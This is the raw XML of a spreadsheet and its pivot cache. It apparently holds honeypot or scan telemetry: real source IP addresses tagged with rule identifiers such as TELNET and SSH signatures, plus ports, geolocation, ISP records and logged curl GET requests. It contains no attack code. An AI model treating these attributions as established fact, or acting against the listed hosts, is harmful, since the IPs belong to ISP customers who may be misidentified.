A-LAB_TELNET_H45</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;16209&amp;&amp;23&amp;&amp;80</t>
  </si>
  <si>
    <t>24.8036</t>
  </si>
  <si>
    <t>120.969</t>
  </si>
  <si>
    <t>::ffff:7220:e72d</t>
  </si>
  <si>
    <t>478217e4615a9fbf21b5cc1de6c23026</t>
  </si>
  <si>
    <t>49.213.135.117</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_DNS_H38&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H38</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;53&amp;&amp;56936&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:31d5:8775</t>
  </si>
  <si>
    <t>0f81d4bfffc8beb18941f51528c376f0</t>
  </si>
  <si>
    <t>65.23.183.10</t>
  </si>
  <si>
    <t>NA&amp;&amp;65-23-183-10-host.drtel.net</t>
  </si>
  <si>
    <t>Dickey</t>
  </si>
  <si>
    <t>Ellendale</t>
  </si>
  <si>
    <t>5059052</t>
  </si>
  <si>
    <t>58436</t>
  </si>
  <si>
    <t>46.0195</t>
  </si>
  <si>
    <t>-98.5253</t>
  </si>
  <si>
    <t>32809</t>
  </si>
  <si>
    <t>Dickey Rural Networks</t>
  </si>
  <si>
    <t>2004-07-29</t>
  </si>
  <si>
    <t>DRN-NET-01</t>
  </si>
  <si>
    <t>2000-01-26 17:28:33</t>
  </si>
  <si>
    <t>2026-01-26 17:28:33</t>
  </si>
  <si>
    <t>2024-12-28 07:29:04</t>
  </si>
  <si>
    <t>['NSA1.DRTEL.NET', 'NSA2.DRTEL.NET']</t>
  </si>
  <si>
    <t>eNom, LLC</t>
  </si>
  <si>
    <t>domainabuse@tucows.com</t>
  </si>
  <si>
    <t>::ffff:4117:b70a</t>
  </si>
  <si>
    <t>001b73de99c65cac636435fd0a436b4c</t>
  </si>
  <si>
    <t>59.127.5.6</t>
  </si>
  <si>
    <t>59-127-5-6.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H28</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;20395&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:3b7f:506</t>
  </si>
  <si>
    <t>8fccc068ef8f02b7b99ac7d3e0ad21c0</t>
  </si>
  <si>
    <t>125.228.91.149</t>
  </si>
  <si>
    <t>125-228-91-149.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H30&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H39</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;80&amp;&amp;52890&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:7de4:5b95</t>
  </si>
  <si>
    <t>2b69af5ab219e7b084e8fb253cad6c0a</t>
  </si>
  <si>
    <t>106.105.93.248</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_SSH_H10&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_H25</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;22&amp;&amp;23&amp;&amp;47187&amp;&amp;38861&amp;&amp;45940&amp;&amp;36602&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:6a69:5df8</t>
  </si>
  <si>
    <t>31e86aa836bc2fccbf2f7492fb02559a</t>
  </si>
  <si>
    <t>117.199.84.115</t>
  </si>
  <si>
    <t>::ffff:75c7:5473</t>
  </si>
  <si>
    <t>ad610c8ead2906622107d1ad81a61105</t>
  </si>
  <si>
    <t>125.229.136.194</t>
  </si>
  <si>
    <t>125-229-136-194.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H20&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_LDAP_H1&amp;&amp;SMA-LAB_SMB_H31&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H28</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;80&amp;&amp;389&amp;&amp;445&amp;&amp;7817&amp;&amp;23&amp;&amp;9100&amp;&amp;24932</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7de5:88c2</t>
  </si>
  <si>
    <t>e25c04c989708fbf830fdcdd91ef0829</t>
  </si>
  <si>
    <t>36.37.221.213</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H4&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H21</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;40526&amp;&amp;23&amp;&amp;9100</t>
  </si>
  <si>
    <t>17</t>
  </si>
  <si>
    <t>Siem Reap</t>
  </si>
  <si>
    <t>Krong Siem Reab</t>
  </si>
  <si>
    <t>1822214</t>
  </si>
  <si>
    <t>13.3618</t>
  </si>
  <si>
    <t>103.861</t>
  </si>
  <si>
    <t>38623</t>
  </si>
  <si>
    <t>VIETTEL (CAMBODIA) PTE., LTD</t>
  </si>
  <si>
    <t>Viettel (cambodia) Pte., Ltd.</t>
  </si>
  <si>
    <t>2011-03-10</t>
  </si>
  <si>
    <t>VIETTEL-CAMBODIA</t>
  </si>
  <si>
    <t>::ffff:2425:ddd5</t>
  </si>
  <si>
    <t>3d72af49d4fd7d259cdb3b474921660e</t>
  </si>
  <si>
    <t>59.126.252.210</t>
  </si>
  <si>
    <t>59-126-252-210.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_SSH_H12&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H43&amp;&amp;SMA-LAB_TELNET_H34</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;22&amp;&amp;14544&amp;&amp;23&amp;&amp;9100&amp;&amp;53330&amp;&amp;49998&amp;&amp;50014&amp;&amp;50058&amp;&amp;50033</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3b7e:fcd2</t>
  </si>
  <si>
    <t>6db77e097a832bef2ce20188a798df2f</t>
  </si>
  <si>
    <t>117.204.164.234</t>
  </si>
  <si>
    <t>::ffff:75cc:a4ea</t>
  </si>
  <si>
    <t>59b136238199ea13fc9a10582a8c44af</t>
  </si>
  <si>
    <t>186.208.6.111</t>
  </si>
  <si>
    <t>SMA-LAB_SSH_H5&amp;&amp;SMA-LAB_LDAP_HC1</t>
  </si>
  <si>
    <t>22&amp;&amp;389</t>
  </si>
  <si>
    <t>Olinda</t>
  </si>
  <si>
    <t>3393536</t>
  </si>
  <si>
    <t>-8.00889</t>
  </si>
  <si>
    <t>-34.8553</t>
  </si>
  <si>
    <t>262713</t>
  </si>
  <si>
    <t>LIDERI TELECOM</t>
  </si>
  <si>
    <t>Lideri Telecom</t>
  </si>
  <si>
    <t>::ffff:bad0:66f</t>
  </si>
  <si>
    <t>2b7f14c42e112637cda89c8312bd7484</t>
  </si>
  <si>
    <t>45.134.79.119</t>
  </si>
  <si>
    <t>39486</t>
  </si>
  <si>
    <t>2019-07-26</t>
  </si>
  <si>
    <t>::ffff:2d86:4f77</t>
  </si>
  <si>
    <t>7075ba9c364fb2ac730c8ac55e7ca212</t>
  </si>
  <si>
    <t>117.243.254.51</t>
  </si>
  <si>
    <t>::ffff:75f3:fe33</t>
  </si>
  <si>
    <t>1c2714e0d824ed9c898b2f0c6ef2c3aa</t>
  </si>
  <si>
    <t>218.161.62.168</t>
  </si>
  <si>
    <t>218-161-62-168.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SOCKS5_H44&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H22</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1080&amp;&amp;15506&amp;&amp;23&amp;&amp;NA&amp;&amp;80&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:daa1:3ea8</t>
  </si>
  <si>
    <t>580b0d461ee1ae6f6e55e38210abd7a9</t>
  </si>
  <si>
    <t>117.202.139.220</t>
  </si>
  <si>
    <t>::ffff:75ca:8bdc</t>
  </si>
  <si>
    <t>cbc1d97e950beb9731e660ed5b62c4ba</t>
  </si>
  <si>
    <t>218.161.88.124</t>
  </si>
  <si>
    <t>NA&amp;&amp;218-161-88-124.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H31</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;62910&amp;&amp;23&amp;&amp;80&amp;&amp;NA&amp;&amp;9100&amp;&amp;43125&amp;&amp;43150&amp;&amp;43187</t>
  </si>
  <si>
    <t>::ffff:daa1:587c</t>
  </si>
  <si>
    <t>b06bcce40e863c9afa23849f28b2a919</t>
  </si>
  <si>
    <t>59.92.191.113</t>
  </si>
  <si>
    <t>::ffff:3b5c:bf71</t>
  </si>
  <si>
    <t>748c7ecf398363477a627dfe8eb5ee92</t>
  </si>
  <si>
    <t>117.2.177.118</t>
  </si>
  <si>
    <t>SMA-LAB_POSTGRES_H40&amp;&amp;SMA-LAB_POSTGRES_HC1</t>
  </si>
  <si>
    <t>::ffff:7502:b176</t>
  </si>
  <si>
    <t>Row Labels</t>
  </si>
  <si>
    <t>Grand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</si>
</sst>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164" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" pivotButton="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="left"/>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inmay" refreshedDate="45805.470576041669" createdVersion="8" refreshedVersion="8" minRefreshableVersion="3" recordCount="3881" xr:uid="{7D0EC837-4586-4EA1-ACB6-0692C414EFB9}">
  <cacheSource type="worksheet">
    <worksheetSource ref="A1:BL3882" sheet="Sheet1"/>
  </cacheSource>
  <cacheFields count="64">
    <cacheField name="md5" numFmtId="0">
      <sharedItems count="3881">
        <s v="7113e49569e9289cb1b04d8a5b0948a7"/>
        <s v="6768678ca9348cde4ce0f42f643b42ca"/>
        <s v="044934b28b588612f403e2bf36a36259"/>
        <s v="76103fa0f15359bfe2b4f91fc47aa126"/>
        <s v="f0240c056c6f650922aed9d5c3f50fcc"/>
        <s v="dd3bd5364e8e07e9cac87a6761b56db9"/>
        <s v="fd9cb944fe4728f7fc6007c377b2b720"/>
        <s v="8ee6183ae812f2c23f2c8e43a28341e3"/>
        <s v="dc2559fcd0cc976764d80aceacc70ea8"/>
        <s v="d120a83f00b1aca92fc1bbcde461ae12"/>
        <s v="0dc4c4b84b72ccef744c138ff0565d4e"/>
        <s v="be4a1933fe9238dadb0c864f27543580"/>
        <s v="2f453a0f7d2ad33a51f61a43cc09b159"/>
        <s v="d1e8be697b406c0655fd9b05bf2cef73"/>
        <s v="72f22998128681da512fb1bdedb9b274"/>
        <s v="fc226719396802487ca17ccf9bc5e6c0"/>
        <s v="1134fd8597f368632b02aea7e31efb34"/>
        <s v="7afa0caf9512896901fcb668489de0f6"/>
        <s v="ffb75dc00e01393a73591530d7548d0a"/>
        <s v="5b24c61106221850ba56ec18c18e9e69"/>
        <s v="096348aab22b64118282fcae62d8f4e4"/>
        <s v="988b7d2fb2b7e2d46fedd67a2527abf6"/>
        <s v="890b83fbf87f9bc1039435a30a8a790a"/>
        <s v="633d2ed8b15ef8cbc4adf81d446300b1"/>
        <s v="cc7c5b1d503c1f96c1803481d2792567"/>
        <s v="9fd68ee9ea3c1a5c9c0a98a8cb9af1da"/>
        <s v="a01eacf0e17abd4ebc0f15b2e48363cf"/>
        <s v="c6b14fb9b168c8c8e8ee12de534f2ec9"/>
        <s v="a964ce18b3696a4e2a3c2635e6d20f5b"/>
        <s v="c9abf3c703efbf43309c78f89f9672e5"/>
        <s v="13aa4fbcd039ced0beb3364c8131e854"/>
        <s v="3ed09ac59c8b97d77135524a72f6f726"/>
        <s v="8ee5bb5078f333bc6b3e4b850ac26aa6"/>
        <s v="c15ef3a9dd28cab32b60bde0b03f23fc"/>
        <s v="19455057b27141797641ff38c21748fd"/>
        <s v="11f2510a1e8f02bd306d2c8f908ea69a"/>
        <s v="05ecb4922f94de60256940b1261b42b9"/>
        <s v="aaa900825d704997dec07233907e1ce3"/>
        <s v="54ce1e5ae033a801a736676335112394"/>
        <s v="bb11e022298917a2778b7016700a4099"/>
        <s v="9a55978539bcb304d258fde60c139ee6"/>
        <s v="b3de7b6dddd65300ab46606cf500881d"/>
        <s v="af8dc75b11f9140e47cfc357095d67b7"/>
        <s v="7b54f875d5300412cc8be2048aa8081e"/>
        <s v="a8e81e17d4d0a0ac09d71224aeaeb632"/>
        <s v="4ee3e571d39247ba319768f4f4e75aa5"/>
        <s v="a4450b5469c60d3f26f939a4cc5351ab"/>
        <s v="b2ab7ed0600fff1aa8a9ad8e45798495"/>
        <s v="fd2bf6f57cc499636f23d21f57412824"/>
        <s v="8fddd7a1822e549cf1555a453487af2e"/>
        <s v="ef3aebf758d2d6d437870cc8bbc5dd3c"/>
        <s v="97e13cf804a1c8ec8cccca9d82b7ae83"/>
        <s v="48200073bc541ba81a9098c9dbafce3d"/>
        <s v="386ea08446ad50178bafd1e928c09f16"/>
        <s v="f56ba422d87de167d7e587a74271f34b"/>
        <s v="c7295118d44f02e52d64183be83fac3a"/>
        <s v="829c26dad00e8ac2ca51165357f313a2"/>
        <s v="7eb97460e81f88d7499f7eda566e95be"/>
        <s v="5142dbe84eaccd0ae97d62c2ace9c695"/>
        <s v="71a5e3f1ee3a51a4fd479919cd6a2528"/>
        <s v="311bcc8a96f0edfc3825e005adc84b71"/>
        <s v="770788748390f8c51849d712bd54d4d8"/>
        <s v="58d267148d2167fea0394438ff1113ce"/>
        <s v="5107431801f854d2ef63cd2fc1202851"/>
        <s v="90a058535baeae9a4849ea85ac3fb757"/>
        <s v="55232c0aa21e0fe12dc444ac09417ef1"/>
        <s v="1bceae00b18f75444e03d27cf5737ed9"/>
        <s v="d8446a96b3c1142ae3463811f7e74fcb"/>
        <s v="31b37e631af7bc37a203bc8ff1740b71"/>
        <s v="a7c30a9992ea643a7c328e1f81c4ed9a"/>
        <s v="473d38cf133716c7aa77b984d7783b4c"/>
        <s v="db37d4fe4de1f37fb3068ce4b641eb0c"/>
        <s v="207a14ff3ddca0a11fbe81e3e461feb1"/>
        <s v="78b7a16a891fb17a10a9a85977f4158b"/>
        <s v="7ef24366eefca14b658c2f48d9fdde86"/>
        <s v="6418a6d666a50ec70162ead5c5d9ccf4"/>
        <s v="7712095bb4f941e9f5e50fa23509f870"/>
        <s v="e7174f327b46de144fde591b03046c06"/>
        <s v="3c8ae6ae6910295118004742dffa1a9a"/>
        <s v="0b2f58bbb3cde0229cdc2cb43a373cf2"/>
        <s v="24d430c0a06d0f8b2c6a3f15762ac6de"/>
        <s v="11b1c0a85dd5dee23913a955703cfae7"/>
        <s v="e3a8ddf4b256b71af350b101c163b907"/>
        <s v="9ec160e8fc38d19cf5e613c30fd4b451"/>
        <s v="7ccd014e3974e85e6a972e247c610044"/>
        <s v="0e5143ded4fe61317801e5b232d8e8dc"/>
        <s v="a83ab289bb9fd0b2087966776dc14153"/>
